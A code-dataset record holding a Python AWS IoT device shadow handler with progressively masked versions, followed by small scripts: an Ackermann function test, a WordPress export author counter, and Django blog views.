-> remote triggering def custom_shadow_callback_delta(self, payload: str, response_status, token): """ :param payload: JSON string ready to be parsed using json.loads(...) :param response_status: ignored :param token: ignored """ # DEBUG dump payload in to syslog LOGGER.debug(payload) # create JSON dictionary from payload payload_dict = json.loads(payload) new_payload = {} # check for command, if received push event on to queue if payload_dict.get('state').get('command'): self.event_queue.put_nowait({"command":payload_dict.get('state').get('command')}) new_payload.update({"state": {"desired": {"command": None}}}) # check for settings, if received push event on to queue if payload_dict.get('state').get('settings'): self.event_queue.put_nowait({"settings":payload_dict.get('state').get('settings')}) new_payload.update({"state": {"desired": {"settings": payload_dict.get('state').get('settings')}}}) LOGGER.info("Shadow update: " + json.dumps(new_payload)) # update shadow instance status self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5) def custom_shadow_callback_get(self, payload, response_status, token): """Callback function records response from get shadow operation :param payload: :param response_status: :param token: :return: """ self._callbackresponses.update({token: {"payload": json.loads(payload), "responseStatus": response_status}}) def get_response(self, token): """Return prior get shadow operation response note each response is deleted when returned, i.e. can only be returned once :param token: :return: """ return self._callbackresponses.pop(token) # post all parameters as a shadow update def post_param(self): new_payload = {"state": {"reported": {"settings": self.settings}, "desired": None}} self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5) # post state update to device shadow and, if enabled, syslog def post_state(self, state): # create new JSON payload to update device shadow new_payload = {"state": {"reported": {"status": state}, "desired": None}} self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20) # log to syslog LOGGER.info("New state" + json.dumps(state)) def post_temperature(self, temp): # create new JSON payload to send device temperature to shadow new_payload = {"state": {"reported": {"cputemp": temp}}} self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20) # log to syslog on debug only LOGGER.debug("New temp payload " + json.dumps(new_payload))
normal
{ "blob_id": "a6d409b806dbd1e174cac65a26c5e8106a8b93ea", "index": 3760, "step-1": "<mask token>\n\n\nclass DeviceShadowHandler:\n\n def status_post(self, status, state=None):\n \"\"\"Post status message and device state to AWSIoT and LOGGER\n\n :param status: status string\n :param state: optional dictionary to add to shadow reported state\n :return:\n \"\"\"\n new_payload = {'state': {'reported': {'status': str(status)},\n 'desired': None}}\n if state:\n new_payload.update({'state': {'reported': state}})\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info(status)\n LOGGER.debug(json.dumps(new_payload))\n\n def __init__(self, thingname: str, host: str, root_ca_path: str,\n private_key_path: str, certificate_path: str):\n \"\"\"Initiate AWS IoT connection\n\n :param thingname: AWSIoT thing name\n :param host: AWSIoT endpoint FQDN\n :param root_ca_path: local file path to Amazon root certificate\n :param private_key_path: local file path to device private key\n :param certificate_path: local file path to device certificate\n \"\"\"\n self.shadow_client = AWSIoTMQTTShadowClient(thingname)\n self.shadow_client.configureEndpoint(host, 8883)\n self.shadow_client.configureCredentials(root_ca_path,\n private_key_path, certificate_path)\n self.shadow_client.configureAutoReconnectBackoffTime(1, 32, 20)\n self.shadow_client.configureConnectDisconnectTimeout(20)\n self.shadow_client.configureMQTTOperationTimeout(20)\n mqtt_client = self.shadow_client.getMQTTConnection()\n mqtt_client.configureOfflinePublishQueueing(-1)\n self.shadow_client.connect(300)\n self.shadow_handler = self.shadow_client.createShadowHandlerWithName(\n thingname, True)\n self.shadow_handler.shadowRegisterDeltaCallback(self.\n custom_shadow_callback_delta)\n self.status_post('STARTING')\n self._callbackresponses = {}\n self.event_queue = queue.SimpleQueue()\n self.settings = {}\n\n def custom_shadow_callback_delta(self, payload: str, response_status, token\n ):\n \"\"\"\n\n :param payload: JSON string ready to be parsed using json.loads(...)\n :param response_status: ignored\n :param token: ignored\n \"\"\"\n LOGGER.debug(payload)\n payload_dict = json.loads(payload)\n new_payload = {}\n if payload_dict.get('state').get('command'):\n self.event_queue.put_nowait({'command': payload_dict.get(\n 'state').get('command')})\n new_payload.update({'state': {'desired': {'command': None}}})\n if payload_dict.get('state').get('settings'):\n self.event_queue.put_nowait({'settings': payload_dict.get(\n 'state').get('settings')})\n new_payload.update({'state': {'desired': {'settings':\n payload_dict.get('state').get('settings')}}})\n LOGGER.info('Shadow update: ' + json.dumps(new_payload))\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def custom_shadow_callback_get(self, payload, response_status, token):\n \"\"\"Callback function records response from get shadow operation\n\n :param payload:\n :param response_status:\n :param token:\n :return:\n \"\"\"\n self._callbackresponses.update({token: {'payload': json.loads(\n payload), 'responseStatus': response_status}})\n <mask token>\n <mask token>\n\n def post_state(self, state):\n new_payload = {'state': {'reported': {'status': state}, 'desired':\n None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info('New state' + json.dumps(state))\n <mask token>\n", "step-2": "<mask token>\n\n\nclass DeviceShadowHandler:\n\n def status_post(self, status, state=None):\n \"\"\"Post status message and device state to AWSIoT and LOGGER\n\n :param status: status string\n :param state: optional dictionary to add to shadow reported state\n :return:\n \"\"\"\n new_payload = {'state': {'reported': {'status': str(status)},\n 'desired': None}}\n if state:\n new_payload.update({'state': {'reported': state}})\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info(status)\n LOGGER.debug(json.dumps(new_payload))\n\n def __init__(self, thingname: str, host: str, root_ca_path: str,\n private_key_path: str, certificate_path: str):\n \"\"\"Initiate AWS IoT connection\n\n :param thingname: AWSIoT thing name\n :param host: AWSIoT endpoint FQDN\n :param root_ca_path: local file path to Amazon root certificate\n :param private_key_path: local file path to device private key\n :param certificate_path: local file path to device certificate\n \"\"\"\n self.shadow_client = AWSIoTMQTTShadowClient(thingname)\n self.shadow_client.configureEndpoint(host, 8883)\n self.shadow_client.configureCredentials(root_ca_path,\n private_key_path, certificate_path)\n self.shadow_client.configureAutoReconnectBackoffTime(1, 32, 20)\n self.shadow_client.configureConnectDisconnectTimeout(20)\n self.shadow_client.configureMQTTOperationTimeout(20)\n mqtt_client = self.shadow_client.getMQTTConnection()\n mqtt_client.configureOfflinePublishQueueing(-1)\n self.shadow_client.connect(300)\n self.shadow_handler = self.shadow_client.createShadowHandlerWithName(\n thingname, True)\n self.shadow_handler.shadowRegisterDeltaCallback(self.\n custom_shadow_callback_delta)\n self.status_post('STARTING')\n self._callbackresponses = {}\n self.event_queue = queue.SimpleQueue()\n self.settings = {}\n\n def custom_shadow_callback_delta(self, payload: str, response_status, token\n ):\n \"\"\"\n\n :param payload: JSON string ready to be parsed using json.loads(...)\n :param response_status: ignored\n :param token: ignored\n \"\"\"\n LOGGER.debug(payload)\n payload_dict = json.loads(payload)\n new_payload = {}\n if payload_dict.get('state').get('command'):\n self.event_queue.put_nowait({'command': payload_dict.get(\n 'state').get('command')})\n new_payload.update({'state': {'desired': {'command': None}}})\n if payload_dict.get('state').get('settings'):\n self.event_queue.put_nowait({'settings': payload_dict.get(\n 'state').get('settings')})\n new_payload.update({'state': {'desired': {'settings':\n payload_dict.get('state').get('settings')}}})\n LOGGER.info('Shadow update: ' + json.dumps(new_payload))\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def custom_shadow_callback_get(self, payload, response_status, token):\n \"\"\"Callback function records response from get shadow operation\n\n :param payload:\n :param response_status:\n :param token:\n :return:\n \"\"\"\n self._callbackresponses.update({token: {'payload': json.loads(\n payload), 'responseStatus': response_status}})\n <mask token>\n\n def post_param(self):\n new_payload = {'state': {'reported': {'settings': self.settings},\n 'desired': None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def post_state(self, state):\n new_payload = {'state': {'reported': {'status': state}, 'desired':\n None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info('New state' + json.dumps(state))\n\n def post_temperature(self, temp):\n new_payload = {'state': {'reported': {'cputemp': temp}}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.debug('New temp payload ' + json.dumps(new_payload))\n", "step-3": "<mask token>\n\n\nclass DeviceShadowHandler:\n\n def status_post(self, status, state=None):\n \"\"\"Post status message and device state to AWSIoT and LOGGER\n\n :param status: status string\n :param state: optional dictionary to add to shadow reported state\n :return:\n \"\"\"\n new_payload = {'state': {'reported': {'status': str(status)},\n 'desired': None}}\n if state:\n new_payload.update({'state': {'reported': state}})\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info(status)\n LOGGER.debug(json.dumps(new_payload))\n\n def __init__(self, thingname: str, host: str, root_ca_path: str,\n private_key_path: str, certificate_path: str):\n \"\"\"Initiate AWS IoT connection\n\n :param thingname: AWSIoT thing name\n :param host: AWSIoT endpoint FQDN\n :param root_ca_path: local file path to Amazon root certificate\n :param private_key_path: local file path to device private key\n :param certificate_path: local file path to device certificate\n \"\"\"\n self.shadow_client = AWSIoTMQTTShadowClient(thingname)\n self.shadow_client.configureEndpoint(host, 8883)\n self.shadow_client.configureCredentials(root_ca_path,\n private_key_path, certificate_path)\n self.shadow_client.configureAutoReconnectBackoffTime(1, 32, 20)\n self.shadow_client.configureConnectDisconnectTimeout(20)\n self.shadow_client.configureMQTTOperationTimeout(20)\n mqtt_client = self.shadow_client.getMQTTConnection()\n mqtt_client.configureOfflinePublishQueueing(-1)\n self.shadow_client.connect(300)\n self.shadow_handler = self.shadow_client.createShadowHandlerWithName(\n thingname, True)\n self.shadow_handler.shadowRegisterDeltaCallback(self.\n custom_shadow_callback_delta)\n self.status_post('STARTING')\n self._callbackresponses = {}\n self.event_queue = queue.SimpleQueue()\n self.settings = {}\n\n def custom_shadow_callback_delta(self, payload: str, response_status, token\n ):\n \"\"\"\n\n :param payload: JSON string ready to be parsed using json.loads(...)\n :param response_status: ignored\n :param token: ignored\n \"\"\"\n LOGGER.debug(payload)\n payload_dict = json.loads(payload)\n new_payload = {}\n if payload_dict.get('state').get('command'):\n self.event_queue.put_nowait({'command': payload_dict.get(\n 'state').get('command')})\n new_payload.update({'state': {'desired': {'command': None}}})\n if payload_dict.get('state').get('settings'):\n self.event_queue.put_nowait({'settings': payload_dict.get(\n 'state').get('settings')})\n new_payload.update({'state': {'desired': {'settings':\n payload_dict.get('state').get('settings')}}})\n LOGGER.info('Shadow update: ' + json.dumps(new_payload))\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def custom_shadow_callback_get(self, payload, response_status, token):\n \"\"\"Callback function records response from get shadow operation\n\n :param payload:\n :param response_status:\n :param token:\n :return:\n \"\"\"\n self._callbackresponses.update({token: {'payload': json.loads(\n payload), 'responseStatus': response_status}})\n\n def get_response(self, token):\n \"\"\"Return prior get shadow operation response\n\n note each response is deleted when returned, i.e. can only be returned once\n\n :param token:\n :return:\n \"\"\"\n return self._callbackresponses.pop(token)\n\n def post_param(self):\n new_payload = {'state': {'reported': {'settings': self.settings},\n 'desired': None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def post_state(self, state):\n new_payload = {'state': {'reported': {'status': state}, 'desired':\n None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info('New state' + json.dumps(state))\n\n def post_temperature(self, temp):\n new_payload = {'state': {'reported': {'cputemp': temp}}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.debug('New temp payload ' + json.dumps(new_payload))\n", "step-4": "<mask token>\nLOGGER = logging.getLogger(__name__)\n\n\nclass DeviceShadowHandler:\n\n def status_post(self, status, state=None):\n \"\"\"Post status message and device state to AWSIoT and LOGGER\n\n :param status: status string\n :param state: optional dictionary to add to shadow reported state\n :return:\n \"\"\"\n new_payload = {'state': {'reported': {'status': str(status)},\n 'desired': None}}\n if state:\n new_payload.update({'state': {'reported': state}})\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info(status)\n LOGGER.debug(json.dumps(new_payload))\n\n def __init__(self, thingname: str, host: str, root_ca_path: str,\n private_key_path: str, certificate_path: str):\n \"\"\"Initiate AWS IoT connection\n\n :param thingname: AWSIoT thing name\n :param host: AWSIoT endpoint FQDN\n :param root_ca_path: local file path to Amazon root certificate\n :param private_key_path: local file path to device private key\n :param certificate_path: local file path to device certificate\n \"\"\"\n self.shadow_client = AWSIoTMQTTShadowClient(thingname)\n self.shadow_client.configureEndpoint(host, 8883)\n self.shadow_client.configureCredentials(root_ca_path,\n private_key_path, certificate_path)\n self.shadow_client.configureAutoReconnectBackoffTime(1, 32, 20)\n self.shadow_client.configureConnectDisconnectTimeout(20)\n self.shadow_client.configureMQTTOperationTimeout(20)\n mqtt_client = self.shadow_client.getMQTTConnection()\n mqtt_client.configureOfflinePublishQueueing(-1)\n self.shadow_client.connect(300)\n self.shadow_handler = self.shadow_client.createShadowHandlerWithName(\n thingname, True)\n self.shadow_handler.shadowRegisterDeltaCallback(self.\n custom_shadow_callback_delta)\n self.status_post('STARTING')\n self._callbackresponses = {}\n self.event_queue = queue.SimpleQueue()\n self.settings = {}\n\n def custom_shadow_callback_delta(self, payload: str, response_status, token\n ):\n \"\"\"\n\n :param payload: JSON string ready to be parsed using json.loads(...)\n :param response_status: ignored\n :param token: ignored\n \"\"\"\n LOGGER.debug(payload)\n payload_dict = json.loads(payload)\n new_payload = {}\n if payload_dict.get('state').get('command'):\n self.event_queue.put_nowait({'command': payload_dict.get(\n 'state').get('command')})\n new_payload.update({'state': {'desired': {'command': None}}})\n if payload_dict.get('state').get('settings'):\n self.event_queue.put_nowait({'settings': payload_dict.get(\n 'state').get('settings')})\n new_payload.update({'state': {'desired': {'settings':\n payload_dict.get('state').get('settings')}}})\n LOGGER.info('Shadow update: ' + json.dumps(new_payload))\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def custom_shadow_callback_get(self, payload, response_status, token):\n \"\"\"Callback function records response from get shadow operation\n\n :param payload:\n :param response_status:\n :param token:\n :return:\n \"\"\"\n self._callbackresponses.update({token: {'payload': json.loads(\n payload), 'responseStatus': response_status}})\n\n def get_response(self, token):\n \"\"\"Return prior get shadow operation response\n\n note each response is deleted when returned, i.e. can only be returned once\n\n :param token:\n :return:\n \"\"\"\n return self._callbackresponses.pop(token)\n\n def post_param(self):\n new_payload = {'state': {'reported': {'settings': self.settings},\n 'desired': None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def post_state(self, state):\n new_payload = {'state': {'reported': {'status': state}, 'desired':\n None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.info('New state' + json.dumps(state))\n\n def post_temperature(self, temp):\n new_payload = {'state': {'reported': {'cputemp': temp}}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n LOGGER.debug('New temp payload ' + json.dumps(new_payload))\n", "step-5": "#!/usr/bin/env python3\n\"\"\"Initiates connection to AWSIoT and provides helper functions\n\ndeviceshadowhandler.py\n\nby Darren Dunford\n\"\"\"\n\nimport json\nimport logging\nimport queue\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTShadowClient\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass DeviceShadowHandler:\n\n def status_post(self, status, state=None):\n \"\"\"Post status message and device state to AWSIoT and LOGGER\n\n :param status: status string\n :param state: optional dictionary to add to shadow reported state\n :return:\n \"\"\"\n\n # create new JSON payload to update device shadow\n new_payload = {\"state\": {\"reported\": {\"status\": str(status)}, \"desired\": None}}\n if state:\n new_payload.update({\"state\": {\"reported\": state}})\n\n # update shadow\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n\n # log to syslog\n LOGGER.info(status)\n LOGGER.debug(json.dumps(new_payload))\n\n # constructor\n def __init__(self, thingname: str, host: str, root_ca_path: str, private_key_path: str, certificate_path: str):\n \"\"\"Initiate AWS IoT connection\n\n :param thingname: AWSIoT thing name\n :param host: AWSIoT endpoint FQDN\n :param root_ca_path: local file path to Amazon root certificate\n :param private_key_path: local file path to device private key\n :param certificate_path: local file path to device certificate\n \"\"\"\n\n # Init Shadow Client MQTT connection\n self.shadow_client = AWSIoTMQTTShadowClient(thingname)\n self.shadow_client.configureEndpoint(host, 8883)\n self.shadow_client.configureCredentials(root_ca_path, private_key_path, certificate_path)\n\n # AWSIoTMQTTShadowClient configuration\n self.shadow_client.configureAutoReconnectBackoffTime(1, 32, 20)\n self.shadow_client.configureConnectDisconnectTimeout(20) # 20 sec\n self.shadow_client.configureMQTTOperationTimeout(20) # 20 sec\n\n # force shadow client to use offline publish queueing\n # overriding the default behaviour for shadow clients in the SDK\n mqtt_client = self.shadow_client.getMQTTConnection()\n mqtt_client.configureOfflinePublishQueueing(-1)\n\n # Connect to AWS IoT with a 300 second keepalive\n self.shadow_client.connect(300)\n\n # Create a deviceShadow with persistent subscription and register delta handler\n self.shadow_handler = self.shadow_client.createShadowHandlerWithName(thingname, True)\n self.shadow_handler.shadowRegisterDeltaCallback(self.custom_shadow_callback_delta)\n\n # initial status post\n self.status_post('STARTING')\n\n # dictionary to hold callback responses\n self._callbackresponses = {}\n\n # callbacks in this class post events on to this queue\n self.event_queue = queue.SimpleQueue()\n\n self.settings = {}\n\n # Custom shadow callback for delta -> remote triggering\n def custom_shadow_callback_delta(self, payload: str, response_status, token):\n \"\"\"\n\n :param payload: JSON string ready to be parsed using json.loads(...)\n :param response_status: ignored\n :param token: ignored\n \"\"\"\n\n # DEBUG dump payload in to syslog\n LOGGER.debug(payload)\n\n # create JSON dictionary from payload\n payload_dict = json.loads(payload)\n new_payload = {}\n\n # check for command, if received push event on to queue\n if payload_dict.get('state').get('command'):\n self.event_queue.put_nowait({\"command\":payload_dict.get('state').get('command')})\n new_payload.update({\"state\": {\"desired\": {\"command\": None}}})\n\n # check for settings, if received push event on to queue\n if payload_dict.get('state').get('settings'):\n self.event_queue.put_nowait({\"settings\":payload_dict.get('state').get('settings')})\n new_payload.update({\"state\": {\"desired\": {\"settings\": payload_dict.get('state').get('settings')}}})\n\n LOGGER.info(\"Shadow update: \" + json.dumps(new_payload))\n\n # update shadow instance status\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n def custom_shadow_callback_get(self, payload, response_status, token):\n \"\"\"Callback function records response from get shadow operation\n\n :param payload:\n :param response_status:\n :param token:\n :return:\n \"\"\"\n self._callbackresponses.update({token: {\"payload\": json.loads(payload), \"responseStatus\": response_status}})\n\n def get_response(self, token):\n \"\"\"Return prior get shadow operation response\n\n note each response is deleted when returned, i.e. can only be returned once\n\n :param token:\n :return:\n \"\"\"\n return self._callbackresponses.pop(token)\n\n # post all parameters as a shadow update\n def post_param(self):\n new_payload = {\"state\": {\"reported\": {\"settings\": self.settings}, \"desired\": None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 5)\n\n # post state update to device shadow and, if enabled, syslog\n def post_state(self, state):\n\n # create new JSON payload to update device shadow\n new_payload = {\"state\": {\"reported\": {\"status\": state}, \"desired\": None}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n\n # log to syslog\n LOGGER.info(\"New state\" + json.dumps(state))\n\n def post_temperature(self, temp):\n\n # create new JSON payload to send device temperature to shadow\n new_payload = {\"state\": {\"reported\": {\"cputemp\": temp}}}\n self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20)\n\n # log to syslog on debug only\n LOGGER.debug(\"New temp payload \" + json.dumps(new_payload))\n", "step-ids": [ 6, 8, 9, 10, 12 ] }
[ 6, 8, 9, 10, 12 ]
# coding: utf-8 #ack program with the ackermann_function """ ackermann_function """ def ack(m,n): #n+1 if m = 0 if m is 0: return n + 1 #A(m−1, 1) if m > 0 and n = 0 if m > 0 and n is 0: return ack(m-1, 1) #A(m−1, A(m, n−1)) if m > 0 and n > 0 if m > 0 and n > 0: return ack(m-1, ack(m, n - 1)) if __name__ == "__main__": expected = [[1,2,3,4,5], [2,3,4,5,6], [3,5,7,9,11], [5,13,29,61,125]] ok = True for m in range(4): for n in range(5): actual = ack(m,n) if not actual == expected[m][n]: print "error" ok = False if ok: print "All tests pass"
normal
{ "blob_id": "0ecd2a298203365b20b2369a99c3c1d7c0646f19", "index": 34, "step-1": "# coding: utf-8\n#ack program with the ackermann_function\n\n\"\"\" ackermann_function \"\"\"\ndef ack(m,n):\n #n+1 if m = 0\n if m is 0:\n \treturn n + 1\n #A(m−1, 1) if m > 0 and n = 0 \n if m > 0 and n is 0:\n \treturn ack(m-1, 1)\n #A(m−1, A(m, n−1)) if m > 0 and n > 0\n if m > 0 and n > 0:\n \treturn ack(m-1, ack(m, n - 1))\n\nif __name__ == \"__main__\":\n\texpected = [[1,2,3,4,5],\n\t\t\t\t[2,3,4,5,6],\n\t\t\t\t[3,5,7,9,11],\n\t\t\t\t[5,13,29,61,125]]\n\tok = True\n\tfor m in range(4):\n\t\tfor n in range(5):\n\t\t\tactual = ack(m,n)\n\t\t\tif not actual == expected[m][n]:\n\t\t\t\tprint \"error\"\n\t\t\t\tok = False\n\tif ok:\n\t\tprint \"All tests pass\"\n\n\t", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
file = open('thegazelle.wordpress.2016-06-22.xml', 'r') text = file.read() authors = [] start = text.find("<wp:author_display_name>") length = len("<wp:author_display_name>") end = text.find("</wp:author_display_name") authors.append(text[start+length+len("<![CDATA["):end-len("]]>")]) while text.find("<wp:author_display_name>", start+1) != -1: start = text.find("<wp:author_display_name>", start+1) end = text.find("</wp:author_display_name>", end+1) authors.append(text[start+length+len("<![CDATA["):end-len("]]>")]) authors.sort() for author in authors: print(author) for i in range(len(authors)-1): if (authors[i] == authors[i+1]): print(authors[i], "was double counted") print(len(authors))
normal
{ "blob_id": "cf5062c999c6c29f103428c247d8d1a4550f9d75", "index": 8086, "step-1": "<mask token>\n", "step-2": "<mask token>\nauthors.append(text[start + length + len('<![CDATA['):end - len(']]>')])\nwhile text.find('<wp:author_display_name>', start + 1) != -1:\n start = text.find('<wp:author_display_name>', start + 1)\n end = text.find('</wp:author_display_name>', end + 1)\n authors.append(text[start + length + len('<![CDATA['):end - len(']]>')])\nauthors.sort()\nfor author in authors:\n print(author)\nfor i in range(len(authors) - 1):\n if authors[i] == authors[i + 1]:\n print(authors[i], 'was double counted')\nprint(len(authors))\n", "step-3": "file = open('thegazelle.wordpress.2016-06-22.xml', 'r')\ntext = file.read()\nauthors = []\nstart = text.find('<wp:author_display_name>')\nlength = len('<wp:author_display_name>')\nend = text.find('</wp:author_display_name')\nauthors.append(text[start + length + len('<![CDATA['):end - len(']]>')])\nwhile text.find('<wp:author_display_name>', start + 1) != -1:\n start = text.find('<wp:author_display_name>', start + 1)\n end = text.find('</wp:author_display_name>', end + 1)\n authors.append(text[start + length + len('<![CDATA['):end - len(']]>')])\nauthors.sort()\nfor author in authors:\n print(author)\nfor i in range(len(authors) - 1):\n if authors[i] == authors[i + 1]:\n print(authors[i], 'was double counted')\nprint(len(authors))\n", "step-4": "file = open('thegazelle.wordpress.2016-06-22.xml', 'r')\ntext = file.read()\nauthors = []\nstart = text.find(\"<wp:author_display_name>\")\nlength = len(\"<wp:author_display_name>\")\nend = text.find(\"</wp:author_display_name\")\nauthors.append(text[start+length+len(\"<![CDATA[\"):end-len(\"]]>\")])\nwhile text.find(\"<wp:author_display_name>\", start+1) != -1:\n start = text.find(\"<wp:author_display_name>\", start+1)\n end = text.find(\"</wp:author_display_name>\", end+1)\n authors.append(text[start+length+len(\"<![CDATA[\"):end-len(\"]]>\")])\nauthors.sort()\nfor author in authors:\n print(author)\n\nfor i in range(len(authors)-1):\n if (authors[i] == authors[i+1]):\n print(authors[i], \"was double counted\")\n\nprint(len(authors))", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- import logging from django.shortcuts import render, redirect, HttpResponse from django.core.urlresolvers import reverse from django.conf import settings from django.contrib.auth import logout, login, authenticate from django.contrib.auth.hashers import make_password from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger from django.db import connection from django.db.models import Count from models import * from forms import * import json logger = logging.getLogger('blog.views') # Create your views here. def global_setting(request): # 站点基本信息 SITE_URL = settings.SITE_URL SITE_NAME = settings.SITE_NAME SITE_DESC = settings.SITE_DESC # 分类信息获取(导航数据) category_list = Category.objects.all()[:6] # 文章归档数据 archive_list = Article.objects.distinct_date() 行 comment_count_list = Comment.objects.values('article').annotate(comment_count=Count('article')).order_by('-comment_count') article_comment_list = [Article.objects.get(pk=comment['article']) for comment in comment_count_list] return locals() def index(request): try: # 最新文章数据 article_list = Article.objects.all() article_list = getPage(request, article_list) # 文章归档 # 1、先要去获取到文章中有的 年份-月份 2015/06文章归档 # 使用values和distinct去掉重复数据(不可行) # print Article.objects.values('date_publish').distinct() # 直接执行原生sql呢? # 第一种方式(不可行) # archive_list =Article.objects.raw('SELECT id, DATE_FORMAT(date_publish, "%%Y-%%m") as col_date FROM blog_article ORDER BY date_publish') # for archive in archive_list: # print archive # 第二种方式(不推荐) # cursor = connection.cursor() # cursor.execute("SELECT DISTINCT DATE_FORMAT(date_publish, '%Y-%m') as col_date FROM blog_article ORDER BY date_publish") # row = cursor.fetchall() # print row except Exception as e: print e logger.error(e) return render(request, 'index.html', locals()) def archive(request): try: # 先获取客户端提交的信息 year = request.GET.get('year', None) month = request.GET.get('month', None) article_list = Article.objects.filter(date_publish__icontains=year+'-'+month) article_list = getPage(request, article_list) except Exception as e: logger.error(e) return render(request, 'archive.html', locals()) # 按标签查询对应的文章列表 def tag(request): try: pass except Exception as e: logger.error(e) return render(request, 'archive.html', locals()) # 分页代码 def getPage(request, article_list): paginator = Paginator(article_list, 2) try: page = int(request.GET.get('page', 1)) article_list = paginator.page(page) except (EmptyPage, InvalidPage, PageNotAnInteger): article_list = paginator.page(1) return article_list # 文章详情 def article(request): try: # 获取文章id id = request.GET.get('id', None) try: # 获取文章信息 article = Article.objects.get(pk=id) except Article.DoesNotExist: return render(request, 'failure.html', {'reason': '没有找到对应的文章'}) # 评论表单 comment_form = CommentForm({'author': request.user.username, 'email': request.user.email, 'url': request.user.url, 'article': id} if request.user.is_authenticated() else{'article': id}) # 获取评论信息 comments = Comment.objects.filter(article=article).order_by('id') comment_list = [] for comment in comments: for item in comment_list: if not hasattr(item, 'children_comment'): setattr(item, 'children_comment', []) if comment.pid == item: item.children_comment.append(comment) break if comment.pid is None: comment_list.append(comment) except Exception as e: print e logger.error(e) return render(request, 'article.html', locals()) # 提交评论 def comment_post(request): try: comment_form = CommentForm(request.POST) if comment_form.is_valid(): #获取表单信息 comment = Comment.objects.create(username=comment_form.cleaned_data["author"], email=comment_form.cleaned_data["email"], url=comment_form.cleaned_data["url"], content=comment_form.cleaned_data["comment"], article_id=comment_form.cleaned_data["article"], user=request.user if request.user.is_authenticated() else None) comment.save() else: return render(request, 'failure.html', {'reason': comment_form.errors}) except Exception as e: logger.error(e) return redirect(request.META['HTTP_REFERER']) # 注销 def do_logout(request): try: logout(request) except Exception as e: print e logger.error(e) return redirect(request.META['HTTP_REFERER']) # 注册 def do_reg(request): try: if request.method == 'POST': reg_form = RegForm(request.POST) if reg_form.is_valid(): # 注册 user = User.objects.create(username=reg_form.cleaned_data["username"], email=reg_form.cleaned_data["email"], url=reg_form.cleaned_data["url"], password=make_password(reg_form.cleaned_data["password"]),) user.save() # 登录 user.backend = 'django.contrib.auth.backends.ModelBackend' # 指定默认的登录验证方式 login(request, user) return redirect(request.POST.get('source_url')) else: return render(request, 'failure.html', {'reason': reg_form.errors}) else: reg_form = RegForm() except Exception as e: logger.error(e) return render(request, 'reg.html', locals()) # 登录 def do_login(request): try: if request.method == 'POST': login_form = LoginForm(request.POST) if login_form.is_valid(): # 登录 username = login_form.cleaned_data["username"] password = login_form.cleaned_data["password"] user = authenticate(username=username, password=password) if user is not None: user.backend = 'django.contrib.auth.backends.ModelBackend' # 指定默认的登录验证方式 login(request, user) else: return render(request, 'failure.html', {'reason': '登录验证失败'}) return redirect(request.POST.get('source_url')) else: return render(request, 'failure.html', {'reason': login_form.errors}) else: login_form = LoginForm() except Exception as e: logger.error(e) return render(request, 'login.html', locals()) def category(request): try: # 先获取客户端提交的信息 cid = request.GET.get('cid', None) try: category = Category.objects.get(pk=cid) except Category.DoesNotExist: return render(request, 'failure.html', {'reason': '分类不存在'}) article_list = Article.objects.filter(category=category) article_list = getPage(request, article_list) except Exception as e: logger.error(e) return render(request, 'category.html', locals())
normal
{ "blob_id": "0b1e6a95ee008c594fdcff4e216708c003c065c8", "index": 4873, "step-1": "# -*- coding: utf-8 -*-\nimport logging\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger\nfrom django.db import connection\nfrom django.db.models import Count\nfrom models import *\nfrom forms import *\nimport json\n\nlogger = logging.getLogger('blog.views')\n\n# Create your views here.\ndef global_setting(request):\n # 站点基本信息\n SITE_URL = settings.SITE_URL\n SITE_NAME = settings.SITE_NAME\n SITE_DESC = settings.SITE_DESC\n # 分类信息获取(导航数据)\n category_list = Category.objects.all()[:6]\n # 文章归档数据\n archive_list = Article.objects.distinct_date()\n 行\n comment_count_list = Comment.objects.values('article').annotate(comment_count=Count('article')).order_by('-comment_count')\n article_comment_list = [Article.objects.get(pk=comment['article']) for comment in comment_count_list]\n return locals()\n\ndef index(request):\n try:\n # 最新文章数据\n article_list = Article.objects.all()\n article_list = getPage(request, article_list)\n # 文章归档\n # 1、先要去获取到文章中有的 年份-月份 2015/06文章归档\n # 使用values和distinct去掉重复数据(不可行)\n 